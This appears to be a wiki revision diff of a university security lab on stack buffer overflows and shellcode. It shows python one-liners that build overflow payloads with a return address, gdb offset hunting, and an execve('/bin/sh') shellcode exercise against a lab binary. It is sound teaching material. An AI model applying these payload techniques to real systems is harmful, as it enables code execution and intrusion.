Show page

Differences

This shows you the differences between two versions of the page.

--- cns:labs:lab-04 [2020/11/02 04:13]
dennis.plosceanu [Phase 3: Reliable crash] fixed for python3
+++ cns:labs:lab-04 [2022/10/31 17:22] (current)
mihai.dumitru2201 [Tasks]
@@ Line 28: / Line 28: @@
 </note>
-You can also use Ghidra/IDA tool in order to analyze the binaries and the disassembled code.
+You can also use Ghidra/IDA tool in order to analyze the binaries and the disassembled code. You can read more about using IDA [[cns:extra:ida|here]].
-===== Debugging with IDA =====
-[[https://www.hex-rays.com/products/ida/ida-executive.pdf| IDA]] is a:
-   * disassembler (As a disassembler, IDA explores binary programs, for which source code isn't always available, to create maps of their execution)
-  *  debugger ( IDA can be used as a local and as a remote debugger on various platforms, including the ubiquitous 80x86, typically Windows/Linux and the ARM platform and other platforms)
-  * decompiler (IDA can transform binary applications into a high level readable text. Unlike disassemblers, which perform the same task at a lower level, the decompiler output is concise, closer to the standard way programmers use to write applications).
-You can see an example with vuln binary from lab-03 archive disassembled in IDA here:
+===== Tutorial  =====
-{{:cns:labs:ida-vuln.jpg?700|}}
+For this tutorial, our goal is to write, inject and use a simple shellcode. In the following steps, we will analyze a simple program, test payloads, assess the vulnerability, then create a shellcode and exploit the program. We will use a very simple shellcode, one that does:
-Also, the decompiled version of the vuln binary with IDA can be seen here:
-{{:cns:labs:ida-vuln-decompile.jpg?700|}}
-You can see a more complex example, taken from ida tutorial screenshots here:
-{{:cns:labs:ida.gif?700|}}
-===== Tutorial  =====
-Let's write a simple shellcode which performs
 <code C>
 exit(1337);
@@ Line 125: / Line 106: @@
 Stopped reason: SIGSEGV
 x0000000000400567 in main ()
-gdb-peda$ patto A3AA
+gdb-peda$ patto AAdAA3AA
 AAdAA3AA found at offset: 64
 </code>
-Notice that the program crashed. We can quickly determine that the program tried to return to **0x4141334141644141**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "A3AA" found at offset 64 in the pattern. This offset is where the return address is situated relative to our input.
+Notice that the program crashed. We can quickly determine that the program tried to return to **0x4141334141644141**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "AAdAA3AA" found at offset 64 in the pattern. This offset is where the old RBP is situated relative to our input.
 ==== Phase 3: Reliable crash ====
@@ Line 252: / Line 233: @@
 <code bash>
-python -c "print len('$(./bin_to_hex.sh shell.bin)')"
+wc -c shell.bin
+ shell.bin
 </code>
@@ Line 259: / Line 240: @@
 <code bash>
-python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(72-12)"
+python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12))"
 </code>
@@ Line 318: / Line 299: @@
 <code bash>
-python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(72-12) + '\x90\xdc\xff\xff\xff\xff'" > payload
+python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\x7f')" > payload
 gdb-peda$ r < payload
 Starting program: vuln < payload
@@ Line 388: / Line 369: @@
 <code asm>
+BITS 64
     jmp string
 start:
-    pop rcx    ; pop address of `hello` variable in rcx
+    pop rsi ; pop address of `hello` variable in rsi (the 2nd syscall argument on 64 bits)
     [...]
+    syscall ; do syscall on 64 bits
 string:
     call start ; jump/trampoline back to start while storing the address of `hello` on the stack
@@ Line 397: / Line 381: @@
 </code>
-The call instruction will push the address of the next "instruction" (in this case, our string), onto the stack.
+The ''call'' instruction will push the address of the next "instruction" (in this case, our string), onto the stack.
 </note>
@@ Line 405: / Line 389: @@
 <code C>
-execve('/bin/sh', ['/bin/sh'], 0);
+execve("/bin/sh", ["/bin/sh", NULL], NULL);
 </code>
-Where //['/bin/sh']// denotes the **address** of the string '/bin/sh'.
+Where ''["/bin/sh", NULL]'' denotes the **address** of the array of two strings address: the address of the ''"/bin/sh"'' string and the ''NULL'' address.
 <note tip>
-You need to get the string '/bin/sh' on the stack. You can do this using the hack from the write challenge.
+You need to get the address of the string ''"/bin/sh"'' on the stack.
+You can do this using the hack from the write challenge.
 </note>
 <note tip>
-You can browse around shellstorm for examples; however, keep in mind that they may not work due to some registers not being set properly.
+You can browse around shellstorm for examples;
+however, keep in mind that they may not work due to some registers not being set properly.
 </note>
 ==== 3. execve with no zeros  ====

Resources

Labs

Lectures

Assignments

Extra

cns/labs/lab-04.1604283197.txt.gz · Last modified: 2020/11/02 04:13 (external edit)

Show page Old revisions

Media Manager Back to top